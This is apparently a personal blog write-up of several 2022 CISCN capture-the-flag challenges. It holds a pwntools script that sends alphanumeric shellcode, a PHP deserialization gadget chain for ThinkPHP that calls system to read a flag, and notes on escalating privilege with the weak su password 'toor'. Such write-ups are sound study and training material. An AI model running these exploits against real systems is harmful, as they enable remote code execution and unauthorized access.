2022 CISCN国赛CTF 部分wp

本次比赛感悟就不说了,我是密码叶。哦哈哈哈。不用害怕自己比赛暴零了,这里简单记录下我非预期拿的密码(也许大家都是在非预期)不,我是在可信计算的,hhhhh。然后再记录下pwn和web

PWN

login:
这道题,耦合,這简单,可是我看参数看了好久但是我好菜,把参数合起来就可以了,哭了,要不然海也能拿个血(或许拿不了)
mmap权限为7,那就可以执行哦,那就构建好参数直接打就行了,用alpha生成可见字符即可
exp:

from pwn import *

#p=remote('47.93.83.221',28093)
p=process("./login")
p.sendlineafter(">>> ",'opt:1\r\nmsg:ro0t\r\n')

sh='Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
p.sendline('opt:2\r\nmsg:'+sh+'\r\n')
p.interactive()

exp好少,想参数想了好久,还是吉尔菜

Web
这道题网上有类似的漏洞,直接拿poc打就行,主办方给的源代码是post传参,注意post传参就行
exp:

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

Crypto
耦合,开始非预期楼,md,这里直接我是密码页,hhhh
基于挑战码的双向认证:
ssh到服务器提权,su 密码是toor即可,这里提权成功了hhhh
find / -name "flag*"
图片就省略啦.....哒哒
基于挑战码的双向认证2:
ssh到服务器提权,su 密码是toor即可,这里提权成功了hhhh
find / -name "flag*"
图片就省略啦.....哒哒
基于挑战码的双向认证3:
ssh到服务器提权,su 密码是toor即可,这里提权成功了hhhh
find / -name "flag*"
图片就省略啦.....哒哒

笑死我了,密码解出3道,俺也会非预期啦

总结:比较遗憾的是没看pwn3,pwn3 uaf,虽然是libc2.34,直接打exithook为onegdat即可,哎,这道题没看要不然也能出。。。。

本文链接:

http://azly.top/index.php/archives/60/
1 + 3 =
快来做第一个评论的人吧~